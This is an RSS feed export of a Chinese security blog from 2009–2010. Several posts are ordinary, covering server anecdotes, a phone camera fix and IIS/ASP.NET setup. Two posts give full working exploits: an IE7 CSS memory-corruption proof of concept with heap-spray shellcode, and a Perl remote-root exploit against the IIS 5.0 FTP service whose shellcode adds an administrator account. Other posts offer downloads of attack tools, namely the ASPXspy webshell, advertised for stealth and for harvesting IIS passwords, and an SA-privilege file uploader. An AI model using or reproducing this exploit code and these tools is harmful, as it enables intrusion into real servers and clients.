<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[Bin-Blog]]></title>
<link>http://www.rootkit.net.cn/</link>
<description><![CDATA[低调。。。。。。]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog2 v2.4]]></copyright>
<webMaster><![CDATA[master@rootkit.net.cn(Bin)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>Bin-Blog</title> 
	<url>http://www.rootkit.net.cn/images/logos.gif</url> 
	<link>http://www.rootkit.net.cn/</link> 
	<description>Bin-Blog</description> 
</image>

			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=142</link>
			<title><![CDATA[我的服务器]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[淫声如梦]]></category>
			<pubDate>Wed,13 Jan 2010 01:17:13 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=142</guid>	
		<description><![CDATA[&nbsp;&nbsp;服务器换了好几个地方了，现在的这个时间是比较久的，感谢朋友的大力支持，当然也少不了大小国际黑客的拜访，能拿到权限的我佩服的五体投地，还有些蛋疼的兄台在那D来D去，有这时间还不如学学人家&#34;Iranian Cyber Army&#34;。发两个图片娱乐下。<br/><br/>我的服务器上还有一个朋友的私服网站。看看里面有多少SHELL。去年10月之前我删除过一批<br/><img src="http://www.rootkit.net.cn/pic/hh.jpg" border="0" alt=""/><br/><br/>最近服务器一直被CC，不知道哪位闲的蛋疼的哥们，我看你到底能疼多久。<br/><br/><img src="http://www.rootkit.net.cn/pic/hh1.jpg" border="0" alt=""/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=141</link>
			<title><![CDATA[诺基亚N93摄像头黑屏的救星]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[淫声如梦]]></category>
			<pubDate>Mon,28 Dec 2009 00:05:15 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=141</guid>	
		<description><![CDATA[&nbsp;&nbsp;说起我的N93还是很有纪念意义的，刚工作的时候用两个月的工钱买的，那个破卡尔蔡司摄像头惹出了不少麻烦，被哥们掰来掰去掰黑屏了，在网上一顿狂搜，那些什么&#34;去客服啊&#34;，“格机啊”，”换件啊“，“放水里啊”，&#34;放火里啊&#34;，让人哭笑不得。终于在塞班找到了一位牛淫哥哥的答案。<br/><br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.rootkit.net.cn/images/quote.gif" style="margin:0px 2px -3px 0px" alt="引用内容"/> 引用内容</div><div class="UBBContent"><br/>我的小I在拍照的时候出现了很多条红白条纹,如果出现以下这个情况,有2种解决方案:<br/><br/>1.在照相和摄像来回的切换，稍微切换个4次至5次,我最多一次好像切换了10次左右 果然好了 .所以如果有的朋友和我的一样 不妨也试试能不能修好~!<br/><br/>2.就是小I在旋转屏幕照相的时候将屏幕旋转到底,然后看看你的屏幕,是不是黑屏就不存在了?<br/></div></div><br/>虽然他的是N93I，但是按照方法1测试成功，膜拜！<br/><br/>这位大哥如果要是搞安全的，估计能挖出来N多0day!]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=139</link>
			<title><![CDATA[Sa-Upfile 1.0(sa权限上传文件)]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Thu,10 Dec 2009 15:48:58 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=139</guid>	
		<description><![CDATA[&nbsp;&nbsp;使用环境:SQL2000，SA权限，常用提权扩展存在。<br/><br/>&nbsp;&nbsp;原理 ：利用textcopy进行二进制导入导出。<br/><br/>&nbsp;&nbsp;文件下载 ：<br/><br/>&nbsp;&nbsp;<img src="http://www.rootkit.net.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.rootkit.net.cn/code/safile.rar" target="_blank">SA-Upfile</a><br/> <br/>&nbsp;&nbsp; <img src="http://www.rootkit.net.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://aspxspy.googlecode.com/files/safile.rar" target="_blank">SA-Upfile (Google)</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=138</link>
			<title><![CDATA[南京铱迅发现微软IE7.0 异常CSS导致内存破坏漏洞]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[经典收藏]]></category>
			<pubDate>Sun,22 Nov 2009 21:12:46 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=138</guid>	
		<description><![CDATA[1．漏洞介绍<br/>在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。<br/> <br/>2．漏洞危害(危害等级高)<br/>黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。<br/> <br/>3．通知途径<br/>已经向“国家漏洞库”提交。<br/> <br/>4．<img src="http://www.rootkit.net.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.yxlink.com/download/%5BYV20090432%5DIE7vul.doc" target="_blank">详细文档下载</a><br/>POC:<br/> <br/>更多安全漏洞公布，请关注www.yxlink.com 铱迅安全论坛:bbs.yxlink.com<br/> <br/> <br/>&lt;!--<br/>请将以下内容粘贴到html文件中,利用成功后，会启动windows计算器程序<br/>南京铱迅信息技术有限公司（Nanjing Yxlink Information Technologies Co.,Ltd.）<br/><a href="http://www.yxlink.com" target="_blank">http://www.yxlink.com</a><br/>--&gt;<br/>&lt;!DOCTYPE HTML PUBLIC &#34;-//W3C//DTD XHTML 1.0 Transitional//EN&#34; &#34;<a href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" target="_blank">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd</a>&#34;&gt;<br/>&lt;HTML xmlns=&#34;<a href="http://www.w3.org/1999/xhtml" target="_blank">http://www.w3.org/1999/xhtml</a>&#34;&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;HEAD&gt;<br/>&lt;script&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function load(){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var e;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e=document.getElementsByTagName(&#34;STYLE&#34;)[0];<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e.outerHTML=&#34;1&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;STYLE type=&#34;text/css&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;body{ overflow: scroll; margin: 0; }<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/style&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;SCRIPT language=&#34;javascript&#34;&gt;<br/>var shellcode = unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);<br/>var bigblock = unescape(&#34;%u9090%u9090&#34;);<br/>var headersize = 20;<br/>var slackspace = headersize+shellcode.length;<br/>while (bigblock.length&lt;slackspace) bigblock+=bigblock;<br/>fillblock = bigblock.substring(0, slackspace);<br/>block = bigblock.substring(0, bigblock.length-slackspace);<br/>while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;<br/>memory = new Array();<br/>for (x=0; x&lt;4000; x++) memory[x] = block + shellcode;<br/>&lt;/script&gt;<br/> <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/HEAD&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BODY onload=&#34;load()&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/BODY&gt;<br/>&lt;/HTML&gt;<br/>//yxlink.com<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=137</link>
			<title><![CDATA[WIN2008安装SQL2005出现的&#34;IIS 功能要求&#34;警告解决方案]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Mon,09 Nov 2009 20:05:28 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=137</guid>	
		<description><![CDATA[<a href="http://support.microsoft.com/kb/920201/zh-cn/" target="_blank">http://support.microsoft.com/kb/920201/zh-cn/</a>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=136</link>
			<title><![CDATA[WIN2008+IIS7 配置 ASP.NET 1.1 环境]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Mon,02 Nov 2009 17:14:52 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=136</guid>	
		<description><![CDATA[&nbsp;&nbsp;WIN2008默认可以配置为ASP.NET2.0环境，如果需要1.1的环境，还需要一番折腾，在网上找了几个帖子，每个人的情况都不同，我也会总结下我的配置。<br/><br/>&nbsp;&nbsp;先贴出来几个：<br/><a href="http://learn.iis.net/page.aspx/472/how-to-install-aspnet-11-with-iis7-on-vista-and-windows-2008/" target="_blank">http://learn.iis.net/page.aspx/472/how-to-install-aspnet-11-with-iis7-on-vista-and-windows-2008/</a><br/><br/><a href="http://hi.baidu.com/zhujue2009/blog/item/ecc2d2108ff2b5c4c3fd7889.html" target="_blank">http://hi.baidu.com/zhujue2009/blog/item/ecc2d2108ff2b5c4c3fd7889.html</a><br/><br/><a href="http://www.cnblogs.com/nacarat/archive/2008/03/03/1088986.html" target="_blank">http://www.cnblogs.com/nacarat/archive/2008/03/03/1088986.html</a><br/><br/>以下为我测试的：WIN2008标准版（正版）+IIS7<br/><br/>打开 服务器管理--角色--添加角色--web服务器(IIS)--勾选ASP.NET和ASP(根据实际情况自行选择)<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/1.jpg" border="0" alt=""/><br/><br/>接下来安装 ASP.NET1.1 以及补丁，挨着来吧！<br/><br/>1).NET Framework 1.1 版可再发行组件包<br/><a target="_blank" href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=262d25e3-f589-4842-8157-034d1e7cf3a3">http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=262d25e3-f589-4842-8157-034d1e7cf3a3</a><br/><br/>2).NET Framework 1.1 版Service Pack 1 (.NET1.1累积修补程序)<br/><a target="_blank" href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=a8f5654f-088e-40b2-bbdb-a83353618b38">http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=a8f5654f-088e-40b2-bbdb-a83353618b38</a><br/><br/>3)ASP.NET Security Up&#100;ate for .NET Framework 1.1 SP1 (.NET1.1安全累积更新)<br/><a target="_blank" href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=8ec6fb8a-29eb-49cf-9dbc-1a0dc2273ff9">http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=8ec6fb8a-29eb-49cf-9dbc-1a0dc2273ff9</a><br/><br/>开始配置IIS了，打开服务器管理，角色，Internet信息服务器管理器，开打ISAP和CGI限制，设置ASP.NET1.1为允许。<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/2.jpg" border="0" alt=""/><br/><br/>下面我们要新建一个账号，并把它加入到IIS_IUSRS组，为创建程序池，IIS身份验证做准备。<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/3.jpg" border="0" alt=""/><br/><br/>开打 应用程序池，这里我新建了一个，.NET版本选择1.1<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/4.jpg" border="0" alt=""/><br/><br/>右键点击新建的程序池，选择高级设置<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/5.jpg" border="0" alt=""/><br/><br/>下面修改标识为我们刚才新建的那个账号，修改内置账号为自定义账号<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/6.jpg" border="0" alt=""/><br/><br/>现在开始新建网站了，应用程序池选择刚才我们新建的，其他的自己定义，这里说明下&#34;连接为&#34;，我们选择应用程序用户(通过身份验证)。<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/7.jpg" border="0" alt=""/><br/><br/>然后点击测试连接，如果失败会有相应的提示，否则就是成功。<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/8.jpg" border="0" alt=""/><br/><br/>点击 站点，打开 身份验证，右键选择编辑，选择应用程序池标识。<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/9.jpg" border="0" alt=""/><br/><br/>右键点击 站点&nbsp;&nbsp;编辑权限，安全选项卡，其实就是配置WEB目录的访问权限，防止跨目录访问。<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/10.jpg" border="0" alt=""/><br/><br/>折腾完了，看看能否运行，ASP.NET版本为1.1，一切顺利！<br/><br/><img src="http://www.rootkit.net.cn/pic/iis7/11.jpg" border="0" alt=""/><br/><br/>总结下：<br/>1.安装ASP.NET1.1后会添加IIS_WPG组，把新建的账号添加到这个组也是可以的。<br/>2.至于其他的帖子说 需要 开启 IIS6数据库兼容性，我这里并没开启，也许环境有差异。<br/><br/>IUSR 内建账号，IIS_IUSRS 内建组<br/>IUSR内建帐号替代了IUSR_MachineName帐号<br/>IIS_IUSRS内建组替代了IIS_WPG组<br/>因为IUSR是一个内建帐号，它不再需要密码。逻辑上你可以认为它就是NETWORKSERVICE或LOCALSERVICE帐号。<br/>IIS_IUSRS组是用来替代IIS_WPG组的，它已经拥有了所有的文件和系统资源的访问权限，因此如果一个帐号被添加到该组中，它将以应用程序池身份无缝工作。<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=135</link>
			<title><![CDATA[IIS 5.0 FTPd / Remote r00t exploit]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[经典收藏]]></category>
			<pubDate>Tue,01 Sep 2009 09:34:26 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=135</guid>	
		<description><![CDATA[<div class="UBBPanel"><div class="UBBTitle"><img src="http://www.rootkit.net.cn/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/># IIS 5.0 FTPd / Remote r00t exploit <br/># Win2k SP4 targets <br/># bug found &amp; exploited by Kingcope, kcope2&lt;at&gt;googlemail.com <br/># Affects IIS6 with stack cookie protection <br/># August 2009 - KEEP THIS 0DAY PRIV8 <br/>use IO::Socket; <br/>$|=1; <br/>#metasploit shellcode, adduser &#34;winown:nwoniw&#34; <br/>$sc = &#34;\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49&#34; . <br/>&#34;\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51&#34; . <br/>&#34;\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32&#34; . <br/>&#34;\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41&#34; . <br/>&#34;\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30&#34; . <br/>&#34;\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55&#34; . <br/>&#34;\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b&#34; . <br/>&#34;\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44&#34; . <br/>&#34;\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c&#34; . <br/>&#34;\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d&#34; . <br/>&#34;\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44&#34; . <br/>&#34;\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31&#34; . <br/>&#34;\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f&#34; . <br/>&#34;\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51&#34; . <br/>&#34;\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f&#34; . <br/>&#34;\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46&#34; . <br/>&#34;\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c&#34; . <br/>&#34;\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43&#34; . <br/>&#34;\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44&#34; .<br/>&#34;\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57&#34; . <br/>&#34;\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45&#34; . <br/>&#34;\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e&#34; . <br/>&#34;\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32&#34; . <br/>&#34;\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e&#34; . <br/>&#34;\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47&#34; . <br/>&#34;\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46&#34; . <br/>&#34;\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c&#34; . <br/>&#34;\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f&#34; . <br/>&#34;\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39&#34; . <br/>&#34;\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34&#34; . <br/>&#34;\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e&#34; . <br/>&#34;\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54&#34; . <br/>&#34;\x51\x54\x43\x30\x41\x41&#34;; <br/>#1ca <br/>print &#34;IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n&#34;; <br/>if ($#ARGV ne 1) { <br/>print &#34;usage: iiz5.pl &lt;target&gt; &lt;your local ip&gt;\n&#34;; <br/>exit(0); <br/>} <br/>srand(time()); <br/>$port = int(rand(31337-1022)) + 1025; <br/>$locip = $ARGV[1]; <br/>$locip =~ s/\./,/gi; <br/>if (fork()) { <br/>$sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; $ARGV[0], <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PeerPort =&gt; &#39;21&#39;, <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Proto&nbsp;&nbsp;&nbsp;&nbsp;=&gt; &#39;tcp&#39;); <br/>$patch = &#34;\x7E\xF1\xFA\x7F&#34;; <br/>#$retaddr = &#34;ZZZZ&#34;; <br/>$retaddr = &#34;\x9B\xB1\xF4\x77&#34;; # JMP ESP univ on 2 win2k platforms <br/>$v = &#34;KSEXY&#34; . $sc . &#34;V&#34; x (500-length($sc)-5); <br/># top address of stack frame wh&#101;re shellcode resides, is hardcoded inside this block <br/>$findsc=&#34;\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53&#34; <br/>&nbsp;&nbsp; .&#34;\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0&#34;; <br/># attack buffer <br/>$c = $findsc . &#34;C&#34; . ($patch x (76/4)) . $patch.$patch. <br/>&nbsp;&nbsp; ($patch x (52/4)) .$patch.&#34;EEEE$retaddr&#34;.$patch. <br/>&nbsp;&nbsp; &#34;HHHHIIII&#34;. <br/>$patch.&#34;JKKK&#34;.&#34;\xE9\x63\xFE\xFF\xFF\xFF\xFF&#34;.&#34;NNNN&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>print $sock &#34;USER anonymous\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;PASS anonymous\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;MKD w00t$port\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;SITE $v\r\n&#34;; # We store shellcode in memory of process (stack) <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;SITE $v\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;SITE $v\r\n&#34;; <br/>$x = &lt;$sock&gt;;<br/>print $x; <br/>print $sock &#34;SITE $v\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;SITE $v\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;CWD w00t$port\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;MKD CCC&#34;. &#34;$c\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>print $sock &#34;PORT $locip,&#34; . int($port / 256) . &#34;,&#34; . int($port % 256) . &#34;\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/># TRIGGER <br/>print $sock &#34;NLST $c*/../C*/\r\n&#34;; <br/>$x = &lt;$sock&gt;; <br/>print $x; <br/>while (1) {} <br/>} else { <br/>my $servsock = IO::Socket::INET-&gt;new(LocalAddr =&gt; &#34;0.0.0.0&#34;, LocalPort =&gt; $port, Proto =&gt; &#39;tcp&#39;, Listen =&gt; 1); <br/>die &#34;Could not cr&#101;ate socket: $!\n&#34; unless $servsock; <br/>my $new_sock = $servsock-&gt;accept(); <br/>while(&lt;$new_sock&gt;) { <br/>print $_; <br/>} <br/>close($servsock); <br/>} <br/><br/></div></div>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=134</link>
			<title><![CDATA[msn9 for windows2003]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Wed,29 Jul 2009 13:53:28 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=134</guid>	
		<description><![CDATA[&nbsp;&nbsp;收集了几个网站，MSN的修改版本，去广告，多开补丁。<br/>&nbsp;&nbsp;<a href="http://pank.org/im/" target="_blank">http://pank.org/im/</a><br/>&nbsp;&nbsp;<a href="http://mess.be/" target="_blank">http://mess.be/</a><br/>&nbsp;&nbsp;<a href="http://apatch.org/downloads.php" target="_blank">http://apatch.org/downloads.php</a><br/>&nbsp;&nbsp;清理MSN工具 <a href="http://pank.org/ftp/im/uninstwl.exe" target="_blank">http://pank.org/ftp/im/uninstwl.exe</a>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=133</link>
			<title><![CDATA[清理友情链接]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[淫声如梦]]></category>
			<pubDate>Mon,20 Jul 2009 10:54:10 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=133</guid>	
		<description><![CDATA[&nbsp;&nbsp;网站打不开的，没把我的链接做上的，小弟就PASS了，弄好了再交换，耽误不了多长时间，就此道歉！]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=132</link>
			<title><![CDATA[ASPXspy 2.0 ]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Tue,14 Jul 2009 23:46:23 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=132</guid>	
		<description><![CDATA[1.开发环境VS2008 + C#，兼容FrameWork1.1/2.0，基本实现代码分离,CSS方便参考了phpspy。<br/>2.密码为32位MD5加密(小写) 默认为 admin.<br/>3.全部采用POST方式提交数据，增强了隐蔽性。<br/>4.增强了IIS探测功能，遍历IIS站点信息，绝对路径，多域名绑定，以及IIS账号密码。<br/>5.增加了对指定文件的搜索功能。<br/>6.修正了一些数据库操作的BUG。<br/>7.增强了对注册表的读取，此部分由BloodSword完成，在此感谢。<br/>8.修正了对端口的多线程扫描<br/>9.增强了端口转发功能，参考了Cnqing的一些代码，在此感谢。<br/><br/>免责声明：此工具为安全检测工具，任何人使用此工具，做违法国家法律的事情，责任自负！<br/>联系方式：E-mail:master@rootkit.net.cn Blog:www.rootkit.net.cn<br/><br/><a href="http://code.google.com/p/aspxspy" target="_blank">http://code.google.com/p/aspxspy</a><br/><br/><img src="http://www.rootkit.net.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.rootkit.net.cn/code/aspxspy2.rar" target="_blank">ASPXspy2</a>]]></description>
		</item>
		
</channel>
</rss>